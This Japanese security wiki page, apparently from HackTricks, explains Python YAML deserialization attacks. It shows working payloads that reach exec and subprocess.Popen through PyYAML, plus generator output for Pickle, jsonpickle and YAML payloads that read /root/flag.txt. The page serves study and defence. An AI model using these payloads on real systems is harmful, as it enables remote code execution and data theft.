ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert) ! Yaml Deserialization
Yaml の Python ライブラリは、生データだけでなく Python オブジェクトをシリアライズ することもできます。
Copy print(yaml.dump(str("lol")))
lol
...
print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l
print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1
チェックしてみてください。タプル は生のデータ型ではないため、シリアル化 されました。そして同じことがrange (組み込みから取得)でも起こりました。
**safe_load()または safe_load_all()**はSafeLoaderを使用し、クラスオブジェクトの逆シリアル化をサポートしていません 。クラスオブジェクトの逆シリアル化の例:
Copy import yaml
from yaml import UnsafeLoader , FullLoader , Loader
data = b '!!python/object/apply:builtins.range [1, 10, 1]'
print (yaml. load (data, Loader = UnsafeLoader)) #range(1, 10)
print (yaml. load (data, Loader = Loader)) #range(1, 10)
print (yaml. load_all (data)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. load_all (data, Loader = Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. load_all (data, Loader = UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. load_all (data, Loader = FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. unsafe_load (data)) #range(1, 10)
print (yaml. full_load_all (data)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. unsafe_load_all (data)) #<generator object load_all at 0x7fc4c6d8f040>
#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object
前のコードでは、シリアル化されたPythonクラスをロードするためにunsafe_load を使用しました。これは、version >= 5.1 では、load()内でLoaderが指定されていないかLoader=SafeLoaderとなっていない限り、シリアル化されたPythonクラスやクラス属性をデシリアライズすることができない ためです。
基本的な攻撃
sleepを実行する例 :
Copy import yaml
from yaml import UnsafeLoader , FullLoader , Loader
data = b '!!python/object/apply:time.sleep [2]'
print (yaml. load (data, Loader = UnsafeLoader)) #Executed
print (yaml. load (data, Loader = Loader)) #Executed
print (yaml. load_all (data))
print (yaml. load_all (data, Loader = Loader))
print (yaml. load_all (data, Loader = UnsafeLoader))
print (yaml. load_all (data, Loader = FullLoader))
print (yaml. unsafe_load (data)) #Executed
print (yaml. full_load_all (data))
print (yaml. unsafe_load_all (data))
Loaderなしでの脆弱な.load("<content>")
古いバージョンのpyyamlは、何かをロードする際にLoaderを指定しなかった場合に、逆シリアル化攻撃の脆弱性がありました: yaml.load(data)
こちらの脆弱性の説明 が見つかります。 そのページで提案されている攻撃 は次のとおりです:
Copy !!python/object/new:str
state : !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state :
update : !!python/name:exec
または、@ishaackが提供するこのワンライナー を使用することもできます:
Copy !!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}
注意:最近のバージョン では、Loader
なしで .load()
を呼び出すことはできなくなりました 。また、FullLoader
はこの攻撃に対して脆弱ではなくなりました 。
RCE
PyYAML やruamel.yaml などのPython YAMLモジュールを使用して、カスタムペイロードを作成することができます。これらのペイロードは、適切なサニタイズを行わずに信頼できない入力をデシリアライズするシステムの脆弱性を悪用することができます。
Copy import yaml
from yaml import UnsafeLoader , FullLoader , Loader
import subprocess
class Payload ( object ):
def __reduce__ ( self ):
return (subprocess . Popen , ( 'ls' , ))
deserialized_data = yaml . dump ( Payload ()) # serializing data
print (deserialized_data)
#!!python/object/apply:subprocess.Popen
#- ls
print (yaml. load (deserialized_data, Loader = UnsafeLoader))
print (yaml. load (deserialized_data, Loader = Loader))
print (yaml. unsafe_load (deserialized_data))
ペイロードを作成するツール
このツールは、Pickle、PyYAML、jsonpickle、およびruamel.yaml を悪用するためのPython逆シリアル化ペイロードを生成するために使用できます:https://github.com/j0lt-github/python-deserialization-attack-payload-generator
Copy python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All ) :All
Done Saving file !!!!
cat /tmp/example_jspick
{ "py/reduce" : [{ "py/type" : "subprocess.Popen" }, { "py/tuple" : [{ "py/tuple" : [ "cat" , "/root/flag.txt" ]}]}]}
cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg = =
cat /tmp/example_yaml
!! python/object/apply:subprocess.Popen
- !!python/tuple
- cat
- /root/flag.txt
参考文献
ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert) !